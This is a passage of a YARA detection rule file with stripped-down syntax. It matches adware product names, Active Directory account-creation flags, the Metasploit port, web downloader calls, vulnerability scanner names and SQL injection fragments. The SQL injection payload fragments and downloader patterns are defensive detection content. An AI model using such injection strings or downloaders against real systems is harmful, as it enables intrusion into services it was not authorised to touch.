 $string21 = "dailyrecipeguidetooltab" nocase
 $string22 = "dailywellnessguide" nocase
 $string23 = "dictionaryboss" nocase
 $string24 = "directionsandmap" nocase
 $string25 = "discoverancestry" nocase
 $string26 = "discoverliveradio" nocase
 $string27 = "disk-defrag-setup" nocase
 $string28 = "downspeedtest" nocase
 $string29 = "driver-updater-setup" nocase
 $string30 = "driver.talent" nocase
 $string31 = "driverassist-setup" nocase
 $string32 = "driverdoc" nocase
 $string33 = "drivereasy" nocase
 $string34 = "driverrestore" nocase
 $string35 = "driversupport" nocase
 $string36 = "drivertalent" nocase
 $string37 = "drivertoolkit" nocase
 $string38 = "driverupdate-" nocase
 $string39 = "driverupdate-downloader" nocase
 $string40 = "driverupdate-setup" nocase
 $string41 = "driverwhiz" nocase
 $string42 = "easeware" nocase
 $string43 = "easydriverpro" nocase
 $string44 = "easyhomedecorating" nocase
 $string45 = "easypdfcombine" nocase
 $string46 = "easyphotoedit" nocase
 $string47 = "eliteunzip" nocase
 $string48 = "emailaccessonline" nocase
 $string49 = "everyday lookup" nocase
 $string50 = "everydaylookup" nocase
 $string51 = "filefanatic" nocase
 $string52 = "filesharefanatic" nocase
 $string53 = "flashplayerpro" nocase
 $string54 = "flightsearchapp" nocase
 $string55 = "freemakevideoconvertersetup" nocase
 $string56 = "freemanuals" nocase
 $string57 = "freeradiocast" nocase
 $string58 = "fromdoctopdftooltab" nocase
 $string59 = "funcustomcreations" nocase
 $string60 = "gamingassassin" nocase
 $string61 = "gamingwonderland" nocase
 $string62 = "garden enthusiast" nocase
 $string63 = "gardeningenthusiast" nocase
 $string64 = "getflightinfo" nocase
 $string65 = "getformsonline" nocase
 $string66 = "gettvstreamnow" nocase
 $string67 = "gifables" nocase
 $string68 = "happinessinfusion" nocase
 $string69 = "headlinealley" nocase
 $string70 = "howtosimplified" nocase
 $string71 = "howtosuite" nocase
 $string72 = "inboxace" nocase
 $string73 = "internetspeedtracker" nocase
 $string74 = "knowthebible" nocase
 $string75 = "localcrimewatcher" nocase
 $string76 = "mapsgalaxy" nocase
 $string77 = "marineaquariumlite" nocase
 $string78 = "mergedocsonline" nocase
 $string79 = "mydailyrunway" nocase
 $string80 = "myeasylotto" nocase
 $string81 = "myformsfinder" nocase
 $string82 = "myfuncards" nocase
 $string83 = "mynewsguide" nocase
 $string84 = "mypcbackup" nocase
 $string85 = "myradioplayer" nocase
 $string86 = "myscrapnook" nocase
 $string87 = "mysocialshortcut" nocase
 $string88 = "mytelevisionhq" nocase
 $string89 = "mytransitguide" nocase
 $string90 = "myweatherradar" nocase
 $string91 = "mywebface" nocase
 $string92 = "notehomepage" nocase
 $string93 = "onlinemapfinder" nocase
 $string94 = "openfreely" nocase
 $string95 = "packagetracer" nocase
 $string96 = "pckeeper" nocase
 $string97 = "pdfconverterhq" nocase
 $string98 = "photofriendzy" nocase
 $string99 = "playpoptrivia" nocase
 $string100 = "playthruplayer" nocase
 $string101 = "popularscreensavers" nocase
 $string102 = "ppc-software" nocase
 $string103 = "premierdownloadmanager" nocase
 $string104 = "procleaningsoftware" nocase
 $string105 = "productivityboss" nocase
 $string106 = "productmanualsfinder" nocase
 $string107 = "propccleaner" nocase
 $string108 = "puzzlegamesdaily" nocase
 $string109 = "quotationcafe" nocase
 $string110 = "qyuninst" nocase
 $string111 = "radiorage" nocase
 $string112 = "readingfanatic" nocase
 $string113 = "registry-cleaner" nocase
 $string114 = "regservo" nocase
 $string115 = "removedt" nocase
 $string116 = "safepcrepair" nocase
 $string117 = "scenichomepage" nocase
 $string118 = "searchbar" nocase
 $string119 = "searchformsonline" nocase
 $string120 = "searchpredict" nocase
 $string121 = "slimcleanerplus" nocase
 $string122 = "smsfrombrowser" nocase
 $string123 = "snapmyscreen" nocase
 $string124 = "soccerinferno" nocase
 $string125 = "spyhunter" nocase
 $string126 = "studyhq" nocase
 $string127 = "sweepstakesalley" nocase
 $string128 = "tbieaddin.dll" nocase
 $string129 = "televisionfanatic" nocase
 $string130 = "ticketxplorer" nocase
 $string131 = "timewhackers" nocase
 $string132 = "tooltabextension.dll" nocase
 $string133 = "totalrecipesearch" nocase
 $string134 = "trackapackage" nocase
 $string135 = "translationbuddy" nocase
 $string136 = "unifiedlogger.dll" nocase
 $string137 = "utility chest" nocase
 $string138 = "videodownloadconverter" nocase
 $string139 = "votinstw" nocase
 $string140 = "votprx" nocase
 $string141 = "wb-setup" nocase
 $string142 = "web_bar" nocase
 $string143 = "webdiscover" nocase
 $string144 = "webdiscoverbrowserdownloaderwebesc" nocase
 $string145 = "webext_dl" nocase
 $string146 = "winwb" nocase
 $string147 = "yourtemplatefindertooltab" nocase
 $string148 = "ysearchsettool" nocase
 $string149 = "ysearchutilsvc" nocase
 1 of them

rule ActiveDirectoryDomainFlag
 author = "@neonprimetime"
 description = "AD domain flag"
 $string0 = " /domain " nocase
 1 of them

rule ActiveDirectoryCreateFlag
 author = "@neonprimetime"
 description = "AD Create flag"
 $string0 = " /add " nocase
 $string1 = " /create " nocase
 1 of them

rule MetasploitPort
 author = "@neonprimetime"
 description = "Metasploit Port"
 $string0 = ":4444" nocase
 1 of them

rule AdminFileShareAccess
 author = "@neonprimetime"
 description = "Admin File Share Access"
 $string0 = "admin$" nocase
 1 of them

rule TeamViewerPort
 author = "@neonprimetime"
 description = "TeamViewer Port"
 $string0 = ":5938" nocase
 1 of them

rule ActiveDirectoryCriticalGroup
 author = "@neonprimetime"
 description = "Critical AD groups"
 $string0 = "domain admins" nocase
 $string1 = "enterprise admins" nocase
 $string2 = "schema admins" nocase
 $string3 = "workstation admins" nocase
 $string4 = "dns admins" nocase
 $string5 = "server admins" nocase
 1 of them

rule NewUser
 author = "@neonprimetime"
 description = "New User Commands"
 $string0 = "new-localuser" nocase
 $string1 = "new-aduser" nocase
 1 of them

rule WebDownloader
 author = "@neonprimetime"
 description = "Web Downloader"
 $string0 = "DownloadFile(" nocase
 $string1 = "DownloadString" nocase
 $string2 = "WebRequest" nocase
 $string3 = "wget" nocase
 $string4 = "bitstransfer" nocase
 1 of them

rule McAfeeQuarantineFile
 author = "@neonprimetime"
 description = "McAfee Quarantine File"
 $string0 = "\\quarantine\\" nocase
 $string1 = ".bup" nocase
 1 of them

rule VulnerabilityScanner
 author = "@neonprimetime"
 description = "Vulnerability Scanner"
 $string0 = "AngryIP" nocase
 $string1a = "\\Nmap " nocase
 $string1b = "/Nmap." nocase
 $string1c = " Nmap " nocase
 $string1d = " Nmap." nocase
 $string2 = "Nessus" nocase
 $string3 = "sqlmap" nocase
 $string4 = "nikto" nocase
 $string5 = "wpscan" nocase
 $string6 = "hyrda" nocase
 $string7 = "dirbuster" nocase
 $string8 = "masscan" nocase
 $string9 = "morfeus" nocase
 $string10 = "sqlninja" nocase
 1 of them

rule SqlInjection
 author = "@neonprimetime"
 description = "Sql Injection"
 $string0 = "UNION+ALL+SELECT" nocase
 $string1 = ",NULL,NULL" nocase
 $string2 = "AND+SLEEP" nocase
 $string3 = "PG_SLEEP" nocase
 $string4 = "WAITFOR+DELAY" nocase
 $string5 = "CONCAT(0x" nocase
 $string6 = "UNION+SELECT" nocase
 $string7 = "--+" nocase
 $string8 = "')UNION ALL SELECT" nocase
 $string9 = ",NULL,NULL" nocase
 $string10 = "AND SLEEP" nocase
 $string11 = "WAITFOR DELAY" nocase
 $string12 = "CONTACT(0x" nocase
 $string13 = "UNION SELECT" nocase
 $string14 = "UNION+ALL+SELECT" nocase
 $string15 = "AND+SLEEP" nocase
 $string16 = "WAITFOR+DELAY" nocase
 $string17 = "UNION+SELECT)" nocase
 1 of them